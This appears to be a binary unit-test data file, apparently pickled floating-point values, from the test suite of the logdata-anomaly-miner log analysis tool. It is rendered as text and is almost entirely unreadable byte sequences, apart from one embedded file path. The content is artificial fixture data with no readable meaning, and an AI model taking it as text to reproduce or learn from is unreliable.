G?`Vv,G?ΦD#G?G?AqG?[tG?֖G?AGlG?,"p@G?+;G?,XJZG?ɱ_DG?ƪ#"ܽG?uG?0G?MdKG?ږgcG?4EMG?YdG?t7EG?HhG?;HŁBG?bzG?kG?G?*;9G?GQ6G?q', /G?ƽOG?G?!?G?!B2G?$#9G?0ݑaG?ˮ%VG?+ G?3X,DG?/IՍ G?FdyG?g^{G?l\lG?՗ӉR&G?,OjSG?Ҫ[M,G?ofmG?R/yR G?'6G?tüG? .>IG?G?5y?G?4R G?ƭe G?߫G?ٶ%aG?SOJG?UMiG?>d"~G?긏MG?mC^G?ue#vG?ÉʣMgG?iרG?ۯMG?5>G?G ?G?V~G?},y;.G?_>G?DcG?G?zfCG?JmG?̻ŜnG? ; U G?ȇeG?Ʌ G?,a/ҟG?ȼ3G?XG?ibRG?KgXG?5WM3G?I FuG?hiG?՝ G?J+XG?) Bn6G?)a(G?JxG?1U >G?[wG?KS7G?ɡtnyG?ՕIşG?F|OG?oZ/KG?ۭ-;4G?JG?|G?AԊG?yi#G?jW^xG?G?ƂwG?.ܛG?~G?(q#G?xG?z(G?Ѓ&0p!G?ӴqG?#nG?vYG?҈}^G?1yAG?XG?*G?hG?U=Y`G?;0G?CnC"G?2G?A`bG?M3R/G?W֨G?.PG?qLG?a;<G?&WG?_+G?S NG?вOG?~@ЖG? 3G?apG?Ņ ՞G?ֲCG?PeTG?o+G?Qm2G?̮`G?vvVEG?\VG?߼3G?ӂuCG?zG?ζfG?Hw.?G?XzJ7G? mWPG?џG?jp74G?ںwhG?Ӿ[ UG?vgG?ĩS G?4G?m/ G? %_G?w]-BG?k! ?YG?4 G?~G? 9*G?ׅG?̳zJٞG?Y:G?kGG?xoI G?%4{G?֙HG?`kG?G?hӄvG?Q5aG?Y^&G?^G?{lG?4<$G?WG??_KD$G?/̔G?G?~G?[G?UG?׆G?BMG?G?ѭNG?8jG?SC{ҳG?,e@ G?foG?ԖG?)=OJG?Vy< G? #G? wG?՝PkG?G?r&GG?'G?n"(G?ç ~gG?>ɮG?k1,%PG?.G?ū!#?G?(vUG?d#G?t)1G? }8G?"AӲG?cbG?㰆PG?G?ś\G?9CcG?SeG?¥qG?}H'1G?x7G??f4G?!zG?-랓G?O/G?;}ZKG?/JLG?θJG?_k;G?b5G?S~Z,G?ؤuG?-8X %G?aq ;G?l-/ G?g2<G?æ+*G?׈orG?ξB{G?Z[G?ƽDyG?˧G?9vG?~ wPG?GIvG?ؼ2HG?\3FHG?kG?ZN#G?5G? jwG?(uG?02tG?˨G?Zm4G?6=G? JHG? ."0G? 9=qG? #G? 5lhG?-Qg*G?)9AG?Yv(G?w=G?͸qJ4G?>B6DG?y G?ŷG?#UZG?ο[ G?&ǺG?7/G?^h 0G?֑P;G? ǵAG? TG?bPF9G?ѭz1lG?‚ɱ,G?-wlG?${`G?ߔ@>G?CG? 7FG? G?kCG?? G?=G?7GwfG?;j;WG?C{G?="i+.G?{EG?N7\yG?=WG?+TG?E/f~G?G?HKQ0G?St^0G?B_ LG?ٰG?ѴߓIG?&=r!G?޹G?ȕ!LjG?{rcG?_GMG?ĹV̵|G?žJG?W*JG?7r\4nG?_x[G?%G?ԉ-gG?'`8 G?CL72G?m G?ާMWG?Fg G?Ɖe]G?B,G?WG?ڦ݂G?vG?8!vG?g>G?G4G?[jܷ4G?KG? ,G?ʬޱIG?ڸ)jG?pЪLG? FlG?1UcG?ݿyG?$*G?5UeG?ͰG?¾ aG?$i?G?/ nG?ݕy(G?oґG?MG?B_;G?G6[G?^ G?VTT!rG?wƩJG?֓+dG? G?]@G?JfãG?LJ[EG?MߕG? o4G?d`RG?@1G?B^𤕹G?ءG?7t8G?L 'G?ViG?ѷTkpG?kd`G?` G?{tG?rPG?ͩQG?'G?גٿ,bG?Ў碥G?ނ4G?ЀfƙPG?+6G?e|G?G?ŋف+G?ZG?І37G?}c?G?z)G?v[k":G?tBG?¸#]G?hS5G?@6]G?FkoG?quG?ӕ&,G?zg>G? G?]9;G?ŏZG?eG?_x8CG?<|ޑZG?xyslG?ߚtG?ҫhTJG?G?P+&G?mG?2dE5G?gY76G?MkAAGG?G?2SG?cEëG?rG? NG?ϑ2G?YJVG?Ԟ2z/G?ꟸG?Z)G?qG?ؠG?7;zG?ݩ lG?]2G?ӻ~G?ҐZ6G?vG?=w}G?!G?MRG?Ԋ8G?T4G?돟[G?l%FG?'BG?]|G?\_`G?>06G?'$KG?^I~}G?l~[%G?ZSEJMG?G?a &G?Њ/ypG?ՏAQG?]G?Տ99G?Ӽ:SvG?J̍G?OG?3G?ٟԭG?1-OOG?سG?HG?@G?h ԞG?,,r-+G?sYMQG?eyG?"W5G? aG?ڦKJ4G?,wG?6I.G?ⴼ]G?NC)qG?ШG?̩6G?U3vG?ߝ. G?㓍ՑG??^ XG?BqbG?wB-G?M4G?0x_G?DVu5)G?ǽXG?":G?`\ G?{ąG?Wf"G?(&s G?Րs^ G?܊ G?dkG?gFo-G?AdJG?[,EG? | l\G?۴G?~@cZG?ʪ8݈G?ag]G?Baj G?(G?D>_G?W~0hG?nz~G?ӴfG?۱'G?M\KG?F-쇢G?TV6G?6<G?HwG?k8G? |G?ǚ1}6gG? ]{G?^ S:G?,gG?\aDG?{7DG?=3G? gG?XpjscG?rIߏG?!nXmG?WOPG?ALɾG?HjٕG?*q 5G?0`=G?ErG?zR6`G?b]G?H&;&G?F. G?BjG?'ӵG?E#ѪG?<Z~G?N/u|&G?,2dG?o-dG?ӑ*:G?VaOG?||G?߳6 G?eG?=.vG?ȱͻG?˒F?2G?G? /eG?҅!xcG?-##G?ͱJG?Ѥ&M G?i5 :G?FG?pEG?e`+MG?xB@G?.H%G?gR7G?ߞG?`=G?ҍ`U3G?΂A4G?ԩ D)G?N!1IG?!)G?qOG?H G?ўwj0G?ˍttG?RyIG?qw.qG?z)=G?vgG?Ā5G? gG?^ʌؔG?ǝ)WG?H%  G?W"G?*$ڝBG?)M!G?zdG?'N;&G?{K&>G?fߥ߼G?Ǫ紐G?PG?g%cG?NPwG?}zFG?ʴ-G?9G?~h!>G?;)G?ΧJ G?ܕ)/2G?ٴzG?c0mG? OXG?ms?BJG?7RG?0t:G?փgG?8֢G?#CfG?APGG?-ٳ/G?3>FxG?Ȉ"`_G?4G?c}G?T2G?+;G?2GG?˲kKG?G?!1P PG?>u[G?5ܹG?)KG?J /ˀG?Լ);G?FHG?Փ5#sG?녷G?ƫ`G?y 8G?/G?ҏLG?[}G?_L_CQG?1G?v+7G?iFzyG?[˭n>nG?~[[NG?竨 G?Q],G?RXG?Ђ72G?r+ G?C%G?*$G?f 6G?o!G?tG?o (G?:OG?aG?C)'G?֏XY՞G?ǩcȥG?jA?G?o#GfG?m4P)G?schEG?ߘG?}AiG?S#G?Ɏ.}CLG?bG?6eG?IG?NG?iazG?TG?hJ G?ZwFrG?JG?yACJG?' ;NG?/G?mνG?ajyG?AEOG?6(h2G?ѫgG?KVQG?;|G?TsG?HG? G?^.aG?IܯgqG?xG?)sG?+9G?9{G?δ|G?Se](G?kJG?Ͼ|PG?Ԑ~G?# >`YG?|+G?Ӄ "G?Ɛj~G?knG?:G?b#xG?6^G?ǩG?>U jG?$1YG?LWG?RܼG?̃ Y5G?!RG?"tnG?֩R]G?=2$pG?ԑiG?U>CG?ـ 0G? JaG?nG?6uG?:}G?? %3G?\EG?֕ԀAPG?G?N^AG?(G?.G?EBEG?Q oG?nrG?f=iG?(G?ũ  G?*VG?D{"G?5rPG?O+hG?+m+G?(@G?փ'rݸG??4[G?bY9G?СPs^˚G? G?7MG?MGV\G?e kG?;')G?A#VG?٘EJG?bG?Ϋ{G?vG?SؑrG?Ό[ G?(K2aLG?ØID8G?3bFR7?G?ؙܸG?kʙJG?ɝD7|G?rzG?4ȥG?X6}G?ڨ0DG?pȍ8G?ǘ2;gG?p.G?ŦY G?xW3-G?wrG?3!*gG?G?/uG?ǫ񌃸G?ԋ.O0G?jgG?oSNMG?]"7G?ԥ^G?׎uG?ˤ@9G?ߡG?FTG?AFG?0&G?Dˈ{G?a1G?7 DG?}s^G?! C}G?!8G?pG?߱Je*G?JVgG?6;G?6 }TG?G?zYzG?ΊײG?qJWG?3s+_kzG?oOPG?c>G?MUG?L@`G?š =G? HKG?\ÂnzG?X>.SwG?܄;`G?G?t}G?׍S@&oG??u! G?‚KKG?n3OG?DAG?Qb8G?xQ G?ִLG?e$vsG?^ZxG?|ktG?d[~9JG?ڝd)G?҅#`PG?KG?㲄 {OG?iG??4yG?K &G?SpGSG?r_YG?ىVG?#G?fBaG?0T^iG?|g!G?6@G?8UcG?6G?r G?5lG?TZ~G? PwG?.aiTJG?q>ctG?rhG?X E%G?G?݂\4G?Cm?G?B&] G?^G?sNaG?0xG?ՔwG?{4{G?.+V$G?:$G?ڵZG?ӿ ^G?J =G?,f:G?ԙG?@G?ʹ ~G?gh-G?֥AUG?d=ּG?}k G?mG?{Oj}G?j޺G?vEXG?wG?O3G?r`qG?LG?'zvG?c-sF?G?.^XG?ὼt G?ƯIG?okQG?x:VG?G?85G?ׅG?PܰG?<{qG?̲$G?=wpfG?ÃTi`G?ßG?̝HG?>Wpȍ6G?FeG?\7 G?M؛G?~nWG?lZ{YG?VDG?zIG?Z)G?ġŒG? w G?KGlG?LsalG?rK]G?:$G?(yG?J)XG?婈PG?@G?`DxG?XbS84G?ӔCG?ӳG?.TuG?BG?(夬G?G?İ:`-"G? &0]!G?J}G?уxMG?LhT:G?;y4)G?TG?" kerG?AG?գB`G?nIG?p>G?Ȁ]G?ˤٲG?ϢT=IJG?;jwG?{G?2mG?͸G?ٿ#ЏG?ի՞G?p89G?v0;WG?&y G?T̾G?KG?߇b%kG?BM}G?iQFG?@ܴ=FG?q{G?Zv G?]/2~G?RKIBEG?,z=G?@`TG?J G?lG?G?҇;KYG? F[G?Iݒ>+G?9xG?ǙPx=G?ߗKG?ՂBG?;G?1%Hu7G?V6 $G?ΪKGG?*|G?;GG?۟`G?W#G?AG?O8G?Ʀ4G? # G?QG?vKٞhG?>G? S(G?ְ[G?qG?DdlG?ƪ[)dG?reG?>v[G?d_G?P:G?N:~bG?3sG?BXCfG?f'G?XG?CVn G?Lf:G?Ĭ9G?ݙ8BPG?䤼83G?gG?m@G?­iC1!G?ؿG?< VCG?، U[G?g> 'G?#G?KV_G?c-|G?q ;G?=-EG?¤D2_$G?yFG?HG?^*G?WG?\`V tG?g'G?ӇLΈG?3G?(G?G?Im:hG?>SG?% ^OG?W&zwPG?hXu~gG?Ӥ$7[G?ӿRJNwG?G?"lfG? i"kG?k+M|G?HG?ߙqzG?V; =RrG?)<'G?!*+\$G?ˤD G?Ҵ]G?qnG?xǜG?7 7G?}_%G?| WG?^ c5G?وG?ɓ\E0vG?e3 G?i~ZG?^DG?Cu{>3G?$ΈG?R֊X)G?^egG?P G?@|G?[G?o.G?rՊzG??RJ0G? oPG?em䋝G?H G?¿-i/G?/ .G?nJXG?Ի0G?dsG?RTюG?g53UkG?[ȥG?!e_3G? a0G?φ`FG?G?<%-G?Zvt\G?faRG?1ݚ䠃G?8G?:G?>k"G?7a 7YTG?nG?˽?1G?f4G? G?kׁoG?ҕʶG?`8G?tձG?kG?ȫ;xG?ʤЧG?MJ~@G?+xG?z<eG?ЏJ G?Q1=G?JXG?'w G?ї1rc G?qcU G?Ps0:G?1cCG?#IG?Bs9G?etG?A'}QG?ٿHG?SJG?=FG?O%EG? YG?Ԁ]5G??cG?£ G?mNlG?"ʊ'G?h4G?YY/G?؇0G?e#G?:|7G?Em[G?pG?Ͼ}G?**6G?ʨ>G?Q!}iG?nCyG?G?G?G?'GkG?sPols_G?M 5G??ZG?  G?DžG?7G?-G?;oքG?VDG?G?ʀG?hg2G?^L2nG? #G?KèG?>c|G?̟4G?t"wG?>מG?xV81G?Y7LFG?ɵG?U[G?%>@G?҄G?<>tG?QG?Օ{I@G?G?:-G?G``G?ϿDfG?#wiz G?ô k\G?z3&G?^pOBG?M5$ZG?AG?=Hx|+G?}G?A!G?{!ǠG?ر-+G?hvqG?rr.G?ƞ #bG?̇u1G?-o"`G?d\G?7/G?WpG??mJG?완G?V4>G?3W2sG?٦>VG?Q2wG?g-_lG?ٲWtѪQG?0/G?Ȼ ;G? 6UkG?L(wG?hJG?b٤G?ʛBG?5C0G?Dm4G?uב'G?HsgG?L螝zG?BdtG?hNΡfG?T =ՃG?x2'G?5QG?K2VG?f'2WG?unG?FgG?Τ~X;rG?|H(G?o2w\$G?…鲅G?n2kG?Ũ4G?;7ígG?ag݆G?=v;G?7֍G?1G? ܆8G?<91?G?wJG?-G{G?sV G?BPV}G?/)G?0xG?~'ŋG?LPdG?ƽ3f2G?,ʼnJZGG?ׂd@OwG?uG?8'rӗG?o#qG?[9,G?c[x,fG?G}G?'Z:G?V$n=_G?LG?tUvJG?OǥJ'G?suUG?lXQ@G?d{G?0C S//G?G?G?pG? ]G>ϨEfG?( G?ĉgMG?s"G?ݭ#G?H1ZG?s7G?_LqG?E3mG?A_G?; pwG?xG?\KfG?ՠƈ G?TC\G?ЭRghG?`[G?c,G?濷^G?IG?g4V'G?i?6ϝG?a26G?ԑIG?5PN*G?)mG?z ^G?[gG?1ڳhG?]\G?.G?7,EG?b֒G?RM:lG?֩bNG?moG?ŇG?`SG?fG?̻n-G?5; 5G?7G?xdHG?fHbG?E) G?z`LLOG?(WG?̈DG?ܝWCyG? "}iG?`XG?G?K)VG?Z)G?-%uG?JlG?4FVG?A2kG?ҷG?tG?M- &0G?. wG?‰03{G? K|?G?mG? ${&G?~3+}G?MYTG?j}( ^G? (6pG?1|\G?ч祖fG?kG?f.G??G?ŽӦG?[G?Փ*G?hQ_ZG?m4G?rG?:[G?ٗYt#G?ьE4;G?oG?PFG?NG?W6mxG?`+8(G?FG?NG?7 ;G?cG?˲' G?"\eG?G?6U0G?VNdvG?o?G? ,%G?RiG?##"mG?xG?ɛ>G?HG?X5G?FhSYG??FWG?tG?kyG?M+G?%>JG?,G?l-%G?vFG?зʰiG?^FG?-Z|G?kR}G?*aHG?|EG? G? WG?Qp8bG?H/cG?"G?_ZG?< 'G?Ь*G?ϧvG?ƺvG?dqrG?J}p6G?̣G? O;G?j.G? tXG? jXG?lcG?oG?هG??ҜG?UI1G?FObfG?Шј׍G?R7xG?նv'G?zG?G?׵/G?/G?8) _G?P+MG?«7]{@G?osG?)wZG?[\G?̮_G.G?/SG?אVVG?G? \@G?PiG?ȖdG?zQG?%QG?n'LG?ʔo/5G?$`G?G?Ï]G? [RG?XbIG?r(G?~MpUG?Ɉi*G? чG?2G?PG?C)G?SwiG?p.ˉG?Kzn G?0XdG?D˻/G?(ˋ%\KG?a\U*G? nG?J!LG?/sG?:ôDG?hEDG?^HG?1-=G?+}SG?ǥcG?JaG?kg}G?3\mG?%`G?bIG?вPEM+G?Sy G?ayEG?xuHG?<׶G?ՅTywAG?|Þ PG?hʤdG?2^&G?ҝR+G?vG?Ybre?wG?~N5G??(G?6MwG?FG?bG?UG?Ճ TG?X#bG?7_ȶG?Sb_IG?GM>ZG?Pi G?X߻G?o G?Ç8-G?+vG?rG?_G? )G?E]„G?5UsG?fﻅTG?G]D͍G?P?mG?@\yG?Ɵ_SOG?н`{G?MsG?ͽu3G?uX?G?G?a-G? G?Li"G?W G?̊{f=G?^:G?l⾨O$G?X1lG?aeG?¼ISҺG?]{=G?Tc돦 G?%lG?G?ʮeB.G?ƌ9%G?Ķ$v;G?l>v.$G?_G?z B'G?r$,G?.YG?yQ2gSe(G?LwG?NG?G?xX~G?؉!cbG?ю,TG?,dG?ݢG?Nh G?BxG?WJWG?r G?6G?i{kzG?oh}!7G?w띧p G?O!FG?+V_G?ƂG?չG?*ֳG?= G?UJr_$G?lAG?qJNG?(qG?7|-G?ã$CPG?yճJG?ʙG?m*[W;G?H"-dG?I ۅG?g+~4XG?:G?rG?{wOG?B8bG?qrG?5mG?a=۫G?'IG?jG?L G?8stNG?YB[G?: G?pCDWG?ѐR07G?!ᥦJG?[T<#G?h{G?okZG?ft:G?Tr?DG?zxLG?cG?~SG?{(G?sAhG!G?Us-G?VDjN-G?(H3KG?0~!SG?E>G?,'dG?KgG?ÜG?pi>QG?gdG?n=G?nG?G?}GG?uXG?PzwG?Iz.G?lBG?ޱeDG?r4iG?'G?2G?JG?Gi7v G?65G?ͦiG?俥"G?\tyJG?md7G?A LԶG?w˓=0G?K2T'G?Px&/G?SG?a(SG?PƉG?%G?j}ҿ:G?'϶G?=^G?~f 2yG?٩G?B*G?mo\G?]G?laG?DxG?6?nCG?6dG?tG?eXG?X (G?,+T^G?9G?ȎJtG?OmG?֗W_AiG?َ0gG?uLG?fVؕG?P*6G?l}G?˯~KG? G?W͒~G?<(F_G?aG?ХDgG?3_ G?\G?8aSdflG?7IG?b2Vo G?-6UG?8󱉏G?lw;,G?a\G?q/;G?IG?l9KmG?`G?_7G?]G?3^.G?J G?[{G?ÞiG?Swj[G?Ť!L;G?ufyG?G?AG?óm^-G? yG?ot'G?ю G?5DpG?*,vG?OwG?х9I{#G?gF2G?_PCYG? R@G?6xG?^G?vG?PaBmG?@*߁G?^G?Jr,QG?aXZG?HG?8BRG?4cRG?١G?Fz@G?{G?èLG?>{DG?[Mhz:G? #G?ygG?-d5G?QψmzG? TG?*'G?=WG?iG?-tG?O<G?߅G?Ϗ=g)G?ѓG?7G?.cG?7OG?EtHG?BG?~yG?9 NbG?tG?{5XWG?BH!G?<G?&˃tG?ΔɲYG?<5KG?iG?^G?)[G?JDjG?cyG?GG?pG?etG?%G?Y4G?]mIiG?#>BG?|.o$ĂG?ivKG?eG?l[/G?HN)G?٣o#G?JPG?l#\G?'G??aG?tǬG?tLG?M/BG?.!eG?аyG?џG?uG? DbG?ԪG?liG?iG?![KG?GPmͯG?!EUG?35G?5-8 G?Ӟ%CG?ʈȚG?v?G?%֫9G?\âAG?PsG?JBKG?7c9G?E#G?%"pG?q2G G?_˶G?@՞6G?մ[X=G?!&WjG?~hYO8G?Њ4G?y+ G?,l=G?rpG?U HqG?2DG? ;0yG?,}~G?uD[mG?Pc5mOG?܉ G?^6>G?|G?Y8G?Z>gG?š،ISG?AckG?آ{VeaG?@UGG?81oG?+ۄW3G?|˧:#G?iG?!_G?ktEG?2 EG?NEeG?O|pG?X/G?׳ҿG? f gG?9^#+G?#Ó@G?՞>0G?]e G?2JG?nؚ&G?,G?^JG?:0G?T;G?eK"TG?VjG?FmG?+[G?0 G?"3G?ſKrG? G?/L۫`sG?~6TG?FWsDG?95IG?{G?90G?4ΓXG?D՝"G?Y\%JG?%9xG?YڟiG?O }G?ΩBG?3 G?>}G?rìG?WX[G?Z G?\G?'OIYG?͙rG?C腳G?k'xSG?6.ZG?ܐ/G? G?cCYGG??#/ G?BRbG?T=G?OG?,MG?ےF)G?blHSG?$u\…G?{kG?LsYTG?ȓR>G?G?.(G?#\G?jMÌG?@G?#G?uGG?{-G?ZTG? ViG?jF~-G?G?6tWG?D,qG?{hTj[G?^zMG?jq?8G?+[bG?,4TcG?4/G?n ^ܾG?: vkG?}TG?'0PG?@G?t"G?}ǶmƝhG? sG?fG?˓ \ ;G?0"G?78jrG?Ąb"G?a _,WG?{rv}G?wy|pG?m,^G?_kG?߯(0!2G?IJG?\'G?W/G?VSLIG?iZĮ G?O+ùG?BG~G?J9aG??~G?򘦼G?B[fG?/k/G?["*G?4G?*rG?7識G?ž؅BG?ɎC9G?ӻG?:ӢdG?ΌG"HG?#׆9G?BjG?kG?ЯQ%G?-gD G?QpG?t ,+G?YQG?MjG?=MTG?F&Y G?˅sAG?VMG?ٓKWrG? ZG? 4G?ϋ8G?\~FMG?MQ G?҇]G?*]"G?Lߌ,G?d`L#G?ڔ(G? G?[׀G? yLG?HE{G?L6CG?^><_G?]p.G?ѯkG?u]ЮіG?رG?%G?5G?k"G?c*G? %G?*qyBG?NG?tvV G?.G?hG?+!uG?׺IJG? G?6bG?qFG?k5nXVcG?ɍcRG?(ZG?{ұ$G?Gp&xEG?ZzG?zqG?>zoG?WtG?mȽWG?\G?ɢ }'G? ǮG??CʂG?VG??ӖAG?ƌ:VG?5G?`ƴG?ٌPƴG?'\itG?P'3G? `߫G?˜HJG?o[G?.'G?ݗ }G?ѨG?qG}G?BG?)RG?dG?9B^G? GG?Լ-K.G?:l)YG?'``G?ZQG?{-G?ӛJMLG?k::_YG?{G?*ugEG?c_rG?[-MG?x¸G?jG?IoVDoG?Ӯ)bG?ļwyQG?xX-G?1n:G?-G?UG?h^VG?xצG?BJG?Ɛa{G?g*G?PG?TM-G?b G?#DG?QKpG?ƎxGmG?3yOzG?G?kXG?귊rG? }iG?KG?5=6/G??G?HMAG?X`KtG?ÚnrG?\G?t ӘG?±`HG?" 0p*G?5j|ahG?ζVJG?}G?L ,G?G?-ۺyG?Im:' G?ЀGdG?68(8G?p^G?ߜG?sG?*{;0G?EʔG?W$G?-QaBG?ѽxG?MMrG?* +G?wG˺AG?W-mG?m@zG?|iG?r/)yG?/ZjG? ՎG?R+~G?`>G?pӣG?n'G?UqG?єVFG?cs?陰G?1VcfG?/TG?J,IG?6G?̕DFG?RHśG?ZVG?nfC.G?`\G?gG?ƂG?R:G?Фs)G?&G?_XHhG?%W G?) oG?RG?͒MB4G? ZG?U4/G?̮=G?NM*G?,SG?VS۱G?."*҂yG?!σG?͢tG?C̊8G?G?ZG?W@-G?ɰBG?ۀV,G?5_ 2G?ϟ ?[G?YjXG?[G?$ujG?(Y0"G?Tue](KKKKKKKKKKKKKKKKKKKKe](KKKKKKKKKKKKKKKKKKKKee.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/beta4_data_test7000066400000000000000000000647021500476301700275310ustar00rootroot00000000000000i](](G?Xl|G?n{G?[nRG?LG?Duo::G?yG? G? ǰgG?d jpG?ӉCOG?F*춉G?p0G?0@G?=WG? tG?0ƪG? gG?; G?ەVvG?]>G?GۅG?@V+ӍG?vIG?ƨG?41 G?8G?g1!G?ɟxG?!1rG?f'yG?unG?ZnG?V^G? MG?"~G??fG?MdKG?˷: G?m_4G?2G?gG?GB@vG?΂:A}G?3dq_G?|؊G?Q\G?0zG?ɰ}G?ɞ4G?Åf)7G?MGG?K4G?;bG?B3G?)øSG?LG? ˜G?sG?9G?ݒC$MG?R SUG?Ď G?'ҿC\MG?boG?k;G?XToG?[G?XNG?ў$=WG?BG? G?2M|iG?Gr"G?:q~G?%~G?)^hG?ʒaxG?ğtHCG?͢#~G?oKLG?|μlG?v?*G?kQ'G?G?"]GG?+8G? G?wDGG?OvG?"-G?&Nx G?aG?V٭ G?vG?rbG?=G? SG?r%G?SŠG?^G?G9G?w:4[G? [+WeG?ܺ[G?z;b}G?йG?p"efOG?ޚ0G?{iOG?~G?ڎG?ZMG?ݢ56.G?t{G?\xG?:0G?jt8G?ΓY`G?G:UG?EG?@|@G?'H,G?SRtG?z_oG?hpG?cs[:CG?2PG?L"G?<놟G?ǵG?hvG?qH5G??֠G?ƒ܎AG?y@JG?LH@G?#xbG?\G?5bqG?w;OG?[h!G?G?~3G?S,&G?Քr1TG?*cG?G?QUVG?j4G?)"5&G?pUbG?iK,|G?G?YzG?&'=fG?bIG?geG?־ɦ"G?¦Y7G?ΏG?+kG?G?11G?HG?ќLOG?*G?ǥ$G?Q+xG?P^9G?o{G?FN0G?v7G?<?G?؍wBsG?RƳ5G?Q sG?vGG? M^"@G?m>CG?Ƚm}G?>zGWG?dG?*?zG?]'G?tHG?G?ɣ vG?̯q,WaG?G?l>rG?|v]4G?IfG?]վG?\럲 G?D_d-dG?iRG?G?Ā]G?$2G?(>G?l1zG?U/G?Y%G?-G?]G?#V{YsG?¹`JG?Z/G?{>G? nG?ZG?G?w #G?-hjs[G?4G?˫|G?HG?ˍ<G?=GG?9ۤG?&q<#GG?w-Q+G?0>\wsG?QG?'G+G?JTaG?GNG?`ęG?_G?͏8vpG?) G?ؾR |G?ì eG?*=,@G?,G?Z_1bG?-cG?ŻsG?{IϟG?ʉgvwG?_ *NG?ܖjCGG?pnJpG? (1G?KH%G?!uT G?|! G? ߇FG?|SG?%tG?nPG?lܞVG?G?`'ϷG?˃(2{G?k~ÐG?폞^G?vp G?J8/سG?dL 퇂G?0WG?IKzn#kG?aer(pG?(KY"'G?=FG?)/G?]G?0?[G?, ضIG? G?^[KG?FG?zRcG?߽[&G?Q|Fj'G?lxG?>gqG?,Sb_G?ǜ2 ^G?ՙVG?wS^G?1wQG?| YG?ՏtG?|G?Tf'wG?ѱNCG?cT ]wG?IEG?92G??+_G?&IlG?k>䩿G?_LmG?Ԋ07G?o,G?> XG?UMe /G?vRG?RCG?wmozG?GrG?E]G?ׄFQQG?G?AG?3"G?3| G?zPqG?`xG?1#[G?]r@G?҄G?Ӕ6G?eTG?˲|G?R@2G?+Z> G?ReG?KG? (G?m jG?p,ɽG?—tNG?ō!G?6UZIG?HVG?2G?G?2'*G?gigG?2Z-G?`G?SEG?G?^HOJG?%G?w G?:FjG?DK@6G?uSG?Q8TG?Y#i4NR]G?(AuG?Ń+_G?gLg;ZG?G?+czG? ~7G?dG?hWnPG?݆Fe;G?)>G?'-G?˹)G?Wñ_PG?G?:xҴG?|SoHG?԰>QG?lrG?ʏG?220G?ʷVG?,G?G?hG?[ Kk*G?)G?oG?KGG?۸ !G?E߽q~G?lK,p\G?U 'G?ٚ)"G?ŏHiG?C~ G?@FG?k}G?!ƅzG?!G?C>?LG?TG?K)#G?ЛG?U)G?ȼG?pJޣG?=`G?AuG?$hHiuG?b))vG?bQG?~= G?ɑZG?x .hG?rG?bhG?2G?ibG?,`h@G?@t oG?p}G?yQG?yG?3`G?l\jG?g e>G?_41kG?4ȴQG?A}G?τeGG? [G?VqG?aִG?ɞ-XG?+'G?RqP 8G?SI5G?q ІG?c0G?7G?lRG?dusG?҄spG?DҠG?V UG?MG?RJG?wSrG?}K%G??֚(G?tϽAG?¥7B'G?Ż*G?_n|i,G?ޓG?46G?yk*7G?5G?G9kG? G?:WHYG?򥭲iG?.G?h2UǞG?Ɵq5ԟG?qDG?B%G?dG?a4*G?XuDG?5G?慩G?6:G?\cUG?u8zG?VΣG?1G?ߨQ6G?$rrG?䄂~G?YcG?UutZG? G?aCG?1uG?2xG?e ]G?FmcG?{G?HbG?i,G?-G?2ZG?6 G?TG?p~AiG?KG?uqb6G?̊)G?}6G?{VD3G?QvG?[./gG?k MG?̜)ʱG?e_沨G?˄=qG?@C?G?XG?L'iG?s:]G?X !_G?NG?تOG?ɜ.G?k4G?v%JI/G?gOG?^݌G?.)G?hG?ٽ G?>G?/w+mG?S'sCG?,kG?G#CG?İ XG?vIZCG?¦9nG?;G?Ã4$ G?ApMG?;BG?m.b%G?KjUzNG? SG?!u\xG?s)d6G? %:)G?FAyG?ܜ? G?EQgG?9QIyG?y'1!G?NɎ%+G?{DAH$G?1MwG?:Aʻ.G?tсG?t!mG?xG?xz3jG?mtGG?M efG?i!FG?vipYHG?!G?3S&OG?m٫xG?}y#G?6ʚG? G?|wG?{Z:)G?GG?˱O#F3G?F?R G?n9G?lrG?kG?CHG?1 G?fnx3G?P+Q7G?AעG? 0)G?VG?=q(nG?_3G?HodmG?5h-GG?iUG?]G?EGjG?YkgG?G?YG?:G? q79G?*kLG?' G?7qtG?OO W͸G?{LG?^H oG?9 ~G?z#qlG?ÜKRG?{[lAG?"kG?kG?#9гG?\r0G?Hf]/G?+cuQG?ˬ1 GG?B+G?0*)G?a0`G?LG6G?pL-?G?MG?a aHG?hҕ}G?ӂP@G?4]3G?ÐGG?Ң)G?Ӷ&G?) ΰG?܄?ХgG?5⪌G?}G?ddEG?p˃G?r3G,G?zG?ׯ\AG?LF@G?mfBG?@BVG?ٯ*eG?SG?ijLG?}H6rG?4P@~G?nBfG?)$G?P`mG?\ҰG?:.^G?IP0YG?¢v4uG?SFىxG?侓P8G?!(G?TG?@oJG?8K\c G?G?RTG?WG?hTtI+G?-$G?,UGfG?ZǾG?g?TG?ԠG?րCxG?'ƛ 0G?_V.G?47G?IIcJG?G?$\G?SG?NeG?r%M{G?4G?sVG?}cyG? V`2G?nG?s FG?(G?3i_:G?HZG??ԦG?[P<G?\NG?xG?NWTG?{WQ/G?x,^{ G?cEG?^XBqG?r>ߘG?@UfG?V&G?r 8G?0_G?2#5G?D۳1G?g ja?G?qkG?)G?0G?^ᑔ)G?~\G? &;WG?6VR1G?<0LxG?x'(oG?ځGG?;U\G?(y/G?ZUG?OeiG?pG?qB̈G?RG?к;G?d|G?ɖkwISG?TG?ƍ+G?=~G?(+jhG?h aqޑG?8G?/.G?ǁ zG?4$SG?StgƃeG?tŒ-G?{G?qIwXG?/UD/G?Mӗ7V7G?\I3FG?2G?pV8G?qn{G?*Bì_G?`"G?mt"G?%d[PG?ѷ$G?ܛ^m3G?$ G?X`薕G?(|@G?B&G?ZG?uE0\G?}2G?G?FޗG?dG?yןG?Z?G?vPG?jq_G?kNxG?n\PG? ٻ G?SdG?߀Q 7BG?ľa]XG?SOG?`OG?'sIuG?erG?؃G?Y_G?٥G?t1G?%IG?E鹸0G?z!hG?ↀ3fG?qMG? T'ΚG?eޛ}G?z5SG?&I(YG?ɼBS2G?P=uzG?YXGDG?E&G?Ŝ*G?+XlG?|lώG?Ϝ9;WG?E8!VG?kG?DG?ZNG?)]7G?yh.XG?qԂG?i;$G?SGWe(G?!0DMfG?spG? JG? ivG?꠳:G?N G?8q\%G?/G?<\G? $OG?x42>hG?VgG?N#G?ƂtG?Vt?G?#僎G?RVG?n۠G?OG?'G?8?G?l}G?VPG? G?幅G?Ū*cM9G?.xnG? 6}@G?8h`ײG?G?@G?4WG?1cG? [(G?ԨXhkG?^cG?$G?k~G?ѷhPG?S ȺxG?FG?y:G?Λ: 